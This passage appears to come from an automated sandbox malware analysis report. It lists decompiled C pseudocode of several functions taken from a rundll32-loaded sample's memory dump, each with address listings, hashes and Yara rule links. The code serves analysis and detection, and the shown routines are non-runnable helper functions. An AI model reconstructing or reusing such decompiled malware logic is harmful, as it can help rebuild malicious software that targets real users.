				_push( *0x4c3d238);
				if( *0x4c3d24c >= 5) {
					__imp__();
					if(__eax == 0) {
						L6:
						_t28 = 8;
						L7:
						if(_t28 != 0) {
							L10:
							 *0x4c3d24c =  *0x4c3d24c + 1;
							L11:
							return _t28;
						}
						_t42 = _a4;
						_t38 = _v8;
						 *_a16 = _a4;
						 *_a20 = E04C32496(_a4, _t38); // executed
						_t18 = E04C3A66E(_t35, _t38, _t42); // executed
						if(_t18 != 0) {
							 *_a8 = _t38;
							 *_a12 = _t18;
							if( *0x4c3d24c < 5) {
								 *0x4c3d24c =  *0x4c3d24c & 0x00000000;
							}
							goto L11;
						}
						_t28 = 0xbf;
						E04C3A1B0();
						__imp__( *0x4c3d238, 0, _t38); // executed
						goto L10;
					}
					_t23 = E04C3A279(_a4, __ecx, _t35, _t40,  &_v8,  &_a4, __eax);
					L5:
					_t28 = _t23;
					goto L7;
				}
				__imp__(); // executed
				if(__eax == 0) {
					goto L6;
				}
				_t23 = E04C38B94(_a4, __ecx, _t35, _t40,  &_v8,  &_a4, __eax); // executed
				goto L5;
			}











                                                                                                                                                                                                                                    0x04c38507
                                                                                                                                                                                                                                    0x04c38508
                                                                                                                                                                                                                                    0x04c38512
                                                                                                                                                                                                                                    0x04c38519
                                                                                                                                                                                                                                    0x04c3851e
                                                                                                                                                                                                                                    0x04c38520
                                                                                                                                                                                                                                    0x04c38526
                                                                                                                                                                                                                                    0x04c38546
                                                                                                                                                                                                                                    0x04c3854e
                                                                                                                                                                                                                                    0x04c38566
                                                                                                                                                                                                                                    0x04c38568
                                                                                                                                                                                                                                    0x04c38569
                                                                                                                                                                                                                                    0x04c3856b
                                                                                                                                                                                                                                    0x04c385a9
                                                                                                                                                                                                                                    0x04c385a9
                                                                                                                                                                                                                                    0x04c385af
                                                                                                                                                                                                                                    0x04c385b5
                                                                                                                                                                                                                                    0x04c385b5
                                                                                                                                                                                                                                    0x04c3856d
                                                                                                                                                                                                                                    0x04c38573
                                                                                                                                                                                                                                    0x04c38576
                                                                                                                                                                                                                                    0x04c38585
                                                                                                                                                                                                                                    0x04c38587
                                                                                                                                                                                                                                    0x04c3858e
                                                                                                                                                                                                                                    0x04c385c2
                                                                                                                                                                                                                                    0x04c385c7
                                                                                                                                                                                                                                    0x04c385c9
                                                                                                                                                                                                                                    0x04c385cb
                                                                                                                                                                                                                                    0x04c385cb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c385c9
                                                                                                                                                                                                                                    0x04c38590
                                                                                                                                                                                                                                    0x04c38595
                                                                                                                                                                                                                                    0x04c385a3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c385a3
                                                                                                                                                                                                                                    0x04c3855d
                                                                                                                                                                                                                                    0x04c38562
                                                                                                                                                                                                                                    0x04c38562
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c38562
                                                                                                                                                                                                                                    0x04c38528
                                                                                                                                                                                                                                    0x04c38530
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c3853f
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 98539cf550a2c2924d36ae7902fa147a08c309b3f3a664c41612ddb2bfb31a62
                                                                                                                                                                                                                                    • Instruction ID: ffee09e7f4a58df857354f70d66e50feeb4d057e275347596905163f82816070
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98539cf550a2c2924d36ae7902fa147a08c309b3f3a664c41612ddb2bfb31a62
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A21107A201204EBEB11EF55D884FAA37FDEB48756F004016F902E7150D779EE459BB1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C3924F, Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e43a17e9097d47ef36fb9b26de0ed49ea0b9078825df613cffc98eb58fa58706
                                                                                                                                                                                                                                    • Instruction ID: 93c28dda68366068ec79e272e05c3fbec5b5e43ae90e1721f6e08f43207b066e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e43a17e9097d47ef36fb9b26de0ed49ea0b9078825df613cffc98eb58fa58706
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6212CB5900259FFEB019F94DD84EEEBB7AEB44705F000065E511A6150C7759E05EB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C31B2F, Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 674962a4bc9a27ac5fb9a572901c775df9df83adbc0775b1d76aed642f4fb702
                                                                                                                                                                                                                                    • Instruction ID: c336d0b37f184ae87539a0b227567b45b19bbe1d2718fa9fa5ae11d497173ea3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 674962a4bc9a27ac5fb9a572901c775df9df83adbc0775b1d76aed642f4fb702
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D2102BA600204BFD721EBA4DC05F9E37BAEB48706F1841A1F605E7190EB70AA008B60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C33D0D, Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                    			E04C33D0D(intOrPtr* _a4, void* _a8) {
				void _v31;
				char _v32;
				void* _t17;
				void* _t19;
				intOrPtr _t21;
				void* _t23;
				signed int _t25;
				signed int _t26;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t40;

				_t25 = 6;
				_v32 = 0;
				memset( &_v31, 0, _t25 << 2);
				_t26 = 0;
				asm("stosw");
				asm("stosb");
				_t31 = 0; // executed
				_t17 = E04C383B7( *0x4c3d258,  &_v32); // executed
				if(_t17 != 0 && _v31 > 2) {
					_t23 = (_v31 & 0x000000ff) + 0xfffffffe;
					_t26 = 0;
					if(_t23 > 0) {
						do {
							_t31 = _t31 +  *((intOrPtr*)(_t32 + _t26 * 4 - 0x10));
							_t26 = _t26 + 1;
						} while (_t26 < _t23);
					}
				}
				_t39 = _t31;
				 *0x4c3d270 = _t31;
				if(_t31 != 0) {
					L8:
					_t19 = E04C3924F( &_a8); // executed
					__eflags = _t19;
					if(_t19 == 0) {
						__eflags = _a8 - 0x1000;
						if(_a8 == 0x1000) {
							goto L10;
						}
					}
				} else {
					_t21 = E04C37923(_t26, _t39);
					_t40 =  *0x4c3d270; // 0xd448b889
					 *_a8 = _t21;
					if(_t40 != 0) {
						goto L8;
					} else {
						if(_t21 == 0) {
							L10:
							_push(5);
							_pop(0);
						} else {
							 *_a4 = 1;
							 *0x4c3d270 = _t21;
						}
					}
				}
				return 0;
			}














                                                                                                                                                                                                                                    0x04c33d18
                                                                                                                                                                                                                                    0x04c33d1d
                                                                                                                                                                                                                                    0x04c33d23
                                                                                                                                                                                                                                    0x04c33d23
                                                                                                                                                                                                                                    0x04c33d25
                                                                                                                                                                                                                                    0x04c33d27
                                                                                                                                                                                                                                    0x04c33d32
                                                                                                                                                                                                                                    0x04c33d34
                                                                                                                                                                                                                                    0x04c33d3b
                                                                                                                                                                                                                                    0x04c33d47
                                                                                                                                                                                                                                    0x04c33d4a
                                                                                                                                                                                                                                    0x04c33d4e
                                                                                                                                                                                                                                    0x04c33d50
                                                                                                                                                                                                                                    0x04c33d50
                                                                                                                                                                                                                                    0x04c33d54
                                                                                                                                                                                                                                    0x04c33d55
                                                                                                                                                                                                                                    0x04c33d50
                                                                                                                                                                                                                                    0x04c33d4e
                                                                                                                                                                                                                                    0x04c33d59
                                                                                                                                                                                                                                    0x04c33d5b
                                                                                                                                                                                                                                    0x04c33d61
                                                                                                                                                                                                                                    0x04c33d89
                                                                                                                                                                                                                                    0x04c33d8d
                                                                                                                                                                                                                                    0x04c33d92
                                                                                                                                                                                                                                    0x04c33d94
                                                                                                                                                                                                                                    0x04c33d96
                                                                                                                                                                                                                                    0x04c33d9d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c33d9d
                                                                                                                                                                                                                                    0x04c33d63
                                                                                                                                                                                                                                    0x04c33d63
                                                                                                                                                                                                                                    0x04c33d68
                                                                                                                                                                                                                                    0x04c33d71
                                                                                                                                                                                                                                    0x04c33d73
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c33d75
                                                                                                                                                                                                                                    0x04c33d77
                                                                                                                                                                                                                                    0x04c33d9f
                                                                                                                                                                                                                                    0x04c33d9f
                                                                                                                                                                                                                                    0x04c33da1
                                                                                                                                                                                                                                    0x04c33d79
                                                                                                                                                                                                                                    0x04c33d7c
                                                                                                                                                                                                                                    0x04c33d82
                                                                                                                                                                                                                                    0x04c33d82
                                                                                                                                                                                                                                    0x04c33d77
                                                                                                                                                                                                                                    0x04c33d73
                                                                                                                                                                                                                                    0x04c33da8

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: dde90476db401c5555616e5daf5351ac06a98a9d295deae91bbe858792ac13fb
                                                                                                                                                                                                                                    • Instruction ID: 542057783b0805b6d614e895f79b7bf0ab19b67e791069de13ff00709d21084e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dde90476db401c5555616e5daf5351ac06a98a9d295deae91bbe858792ac13fb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B113A719102846EFF20DE75CC407BE7BA6EB44356F00453EDC12DA260D375F6858A10
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C36A56, Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			E04C36A56(intOrPtr __eax, void* __ecx, signed int __edx, intOrPtr _a4) {
				unsigned int _v24;
				signed int _v28;
				void* _t11;
				unsigned int* _t12;
				signed int _t14;
				void* _t16;
				signed int _t17;
				unsigned int _t21;
				signed int _t24;
				void* _t25;
				void* _t28;
				signed int _t31;

				_t24 = __edx;
				__imp__(0, 0x400000, 0, _t25, _t28, __ecx, __ecx); // executed
				 *0x4c3d238 = __eax;
				if(__eax != 0) {
					__imp__();
					 *0x4c3d1a8 = __eax;
					_t11 = E04C38F10(__eax, _a4);
					if(_t11 == 0) {
						do {
							_t12 =  &_v24;
							__imp__(_t12);
							__imp__();
							_t21 = _v24;
							_t14 = (_t21 << 0x00000020 | _v28) >> 7;
							L04C3B226();
							_t31 = _t12 + _t14;
							_t16 = E04C37E03(_a4, _t31);
							_t17 = 2;
							_t23 = _t31;
							__imp__(_t17 << _t31, _t14, _t21 >> 7, 9, 0); // executed
						} while (_t16 == 1);
						if(E04C36B96(_t23) != 0) {
							 *0x4c3d260 = 1; // executed
						}
						_t11 = E04C3225B(_t24); // executed
					}
				} else {
					_t11 = 8;
				}
				return _t11;
			}















                                                                                                                                                                                                                                    0x04c36a56
                                                                                                                                                                                                                                    0x04c36a69
                                                                                                                                                                                                                                    0x04c36a71
                                                                                                                                                                                                                                    0x04c36a76
                                                                                                                                                                                                                                    0x04c36a7d
                                                                                                                                                                                                                                    0x04c36a86
                                                                                                                                                                                                                                    0x04c36a8b
                                                                                                                                                                                                                                    0x04c36a92
                                                                                                                                                                                                                                    0x04c36a94
                                                                                                                                                                                                                                    0x04c36a94
                                                                                                                                                                                                                                    0x04c36a99
                                                                                                                                                                                                                                    0x04c36a9f
                                                                                                                                                                                                                                    0x04c36aa5
                                                                                                                                                                                                                                    0x04c36aaf
                                                                                                                                                                                                                                    0x04c36abc
                                                                                                                                                                                                                                    0x04c36ac1
                                                                                                                                                                                                                                    0x04c36ac7
                                                                                                                                                                                                                                    0x04c36ad0
                                                                                                                                                                                                                                    0x04c36ad1
                                                                                                                                                                                                                                    0x04c36ad6
                                                                                                                                                                                                                                    0x04c36adc
                                                                                                                                                                                                                                    0x04c36ae8
                                                                                                                                                                                                                                    0x04c36aea
                                                                                                                                                                                                                                    0x04c36aea
                                                                                                                                                                                                                                    0x04c36af4
                                                                                                                                                                                                                                    0x04c36af4
                                                                                                                                                                                                                                    0x04c36a78
                                                                                                                                                                                                                                    0x04c36a7a
                                                                                                                                                                                                                                    0x04c36a7a
                                                                                                                                                                                                                                    0x04c36afe

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 8c7d233ebccfd749b6355849ef92635cccb72a4c7db8f155d002f7de49a2142e
                                                                                                                                                                                                                                    • Instruction ID: 70cff846a8bd7322c2640c44b9291a76a2c4aa405ce591572fb0aca5f6602791
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c7d233ebccfd749b6355849ef92635cccb72a4c7db8f155d002f7de49a2142e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7411C2777042007FE720ABA4DC09B6E76DAEB44352F104528F906D6180EBB4FD1096A1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C394A9, Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: aacf028395e99761749461118a9eaaadb6f09fcddacb56a30a20ed249b6159eb
                                                                                                                                                                                                                                    • Instruction ID: 6df16119e649ebe6719572b64460d35293f9521e872c9a2d5d9a5269c8e3ff52
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aacf028395e99761749461118a9eaaadb6f09fcddacb56a30a20ed249b6159eb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B601B5B66053116FD3309E6A8C49F3B7F99EB86662F120518F881D7240DBB4DC0196A0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C321CD, Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 32%
                                                                                                                                                                                                                                    			E04C321CD(void* __ecx, signed char* _a4) {
				char _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t18;
				signed short* _t21;
				void* _t23;
				intOrPtr* _t26;

				_t23 = 0;
				_push(0);
				_t18 = 1;
				_t26 = 0x4c3d330;
				E04C384D5();
				while(1) {
					_t8 = E04C312D4(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E04C3809F(_t14);
					if(_t15 == 0) {
						__imp__( *0x4c3d238, 0, _v8);
						break;
					} else {
						 *_t26 = _t15;
						_t26 = _t26 + 4;
						_t23 = _t23 + 1;
						if(_t23 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E04C384D5();
					if(_t18 != 0) {
						_t21 =  *0x4c3d338; // 0x56a9b70
						_t11 =  *_t21 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t21 = _t12;
					}
					return _t18;
				}
				_t18 = 0;
				goto L7;
			}













                                                                                                                                                                                                                                    0x04c321d5
                                                                                                                                                                                                                                    0x04c321d9
                                                                                                                                                                                                                                    0x04c321da
                                                                                                                                                                                                                                    0x04c321db
                                                                                                                                                                                                                                    0x04c321e0
                                                                                                                                                                                                                                    0x04c321e5
                                                                                                                                                                                                                                    0x04c321ec
                                                                                                                                                                                                                                    0x04c321f3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c321f5
                                                                                                                                                                                                                                    0x04c321fa
                                                                                                                                                                                                                                    0x04c321fb
                                                                                                                                                                                                                                    0x04c32202
                                                                                                                                                                                                                                    0x04c3221c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c32204
                                                                                                                                                                                                                                    0x04c32204
                                                                                                                                                                                                                                    0x04c32206
                                                                                                                                                                                                                                    0x04c32209
                                                                                                                                                                                                                                    0x04c3220d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c3220f
                                                                                                                                                                                                                                    0x04c3220d
                                                                                                                                                                                                                                    0x04c32224
                                                                                                                                                                                                                                    0x04c32224
                                                                                                                                                                                                                                    0x04c32226
                                                                                                                                                                                                                                    0x04c3222d
                                                                                                                                                                                                                                    0x04c3222f
                                                                                                                                                                                                                                    0x04c32235
                                                                                                                                                                                                                                    0x04c3223c
                                                                                                                                                                                                                                    0x04c3224c
                                                                                                                                                                                                                                    0x04c32244
                                                                                                                                                                                                                                    0x04c32247
                                                                                                                                                                                                                                    0x04c32247
                                                                                                                                                                                                                                    0x04c3224f
                                                                                                                                                                                                                                    0x04c3224f
                                                                                                                                                                                                                                    0x04c32258
                                                                                                                                                                                                                                    0x04c32258
                                                                                                                                                                                                                                    0x04c32222
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 3fa85261eca86865f0f44b96b26a4b694a5b568eb9b862701ac6ccc8214b2361
                                                                                                                                                                                                                                    • Instruction ID: 1d3c06a4cde04579819f8a46efa171535485e62e31e0cb86891a5373c16356d8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fa85261eca86865f0f44b96b26a4b694a5b568eb9b862701ac6ccc8214b2361
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8501B576200204AAFB00EFE6DC80BBA76ABEB45376F540475B945D6050D67ABD41A660
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C3A72D, Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E04C3A72D(intOrPtr _a4, intOrPtr* _a8) {
				void* _t9;
				void* _t11;
				intOrPtr _t12;
				intOrPtr _t14;
				intOrPtr* _t17;
				intOrPtr* _t19;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr* _t28;

				_t28 = E04C32049(_t9, 8);
				if(_t28 == 0) {
					_t11 = 8;
					return _t11;
				}
				_t12 =  *0x4c3d27c; // 0xa6a5a8
				_t2 = _t12 + 0x4c3e1bc; // 0x6f0072
				_t14 = E04C37B5D(_t2, _a4, _t28); // executed
				_t27 = _t14;
				if(_t27 < 0) {
					L6:
					E04C39039(_t14, _t28);
					return _t27;
				}
				_t17 =  *_t28;
				_t3 = _t28 + 4; // 0x4
				_t25 =  *0x4c3d27c; // 0xa6a5a8
				_t4 = _t25 + 0x4c3e1fc; // 0x740053
				_t27 =  *((intOrPtr*)( *_t17 + 0x18))(_t17, _t4, 0, 0, _t3, 0);
				if(_t27 < 0) {
					_t19 =  *_t28;
					 *((intOrPtr*)( *_t19 + 8))(_t19);
					_t14 = _a4;
				} else {
					_t14 = 0;
					 *_a8 = _t28;
				}
				if(_t27 < 0) {
					goto L6;
				}
				return _t14;
			}












                                                                                                                                                                                                                                    0x04c3a739
                                                                                                                                                                                                                                    0x04c3a73d
                                                                                                                                                                                                                                    0x04c3a7a3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c3a7a3
                                                                                                                                                                                                                                    0x04c3a73f
                                                                                                                                                                                                                                    0x04c3a748
                                                                                                                                                                                                                                    0x04c3a74f
                                                                                                                                                                                                                                    0x04c3a754
                                                                                                                                                                                                                                    0x04c3a758
                                                                                                                                                                                                                                    0x04c3a797
                                                                                                                                                                                                                                    0x04c3a798
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c3a79d
                                                                                                                                                                                                                                    0x04c3a75a
                                                                                                                                                                                                                                    0x04c3a760
                                                                                                                                                                                                                                    0x04c3a764
                                                                                                                                                                                                                                    0x04c3a76e
                                                                                                                                                                                                                                    0x04c3a779
                                                                                                                                                                                                                                    0x04c3a77d
                                                                                                                                                                                                                                    0x04c3a788
                                                                                                                                                                                                                                    0x04c3a78d
                                                                                                                                                                                                                                    0x04c3a790
                                                                                                                                                                                                                                    0x04c3a77f
                                                                                                                                                                                                                                    0x04c3a782
                                                                                                                                                                                                                                    0x04c3a784
                                                                                                                                                                                                                                    0x04c3a784
                                                                                                                                                                                                                                    0x04c3a795
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c3a7a7

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 3264021b966b64a987efe5c265611a528fa56f7a1cd22b5f0d963550374fbad5
                                                                                                                                                                                                                                    • Instruction ID: 3da817bd419a41e300841efdc0ddb340e172e7227a7911bece42d739b7163fdd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3264021b966b64a987efe5c265611a528fa56f7a1cd22b5f0d963550374fbad5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9001C479200604ABD711DB69C880F5677BAEFCA756F108418B548CF240DA72EC01DBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C39318, Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 34%
                                                                                                                                                                                                                                    			E04C39318(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
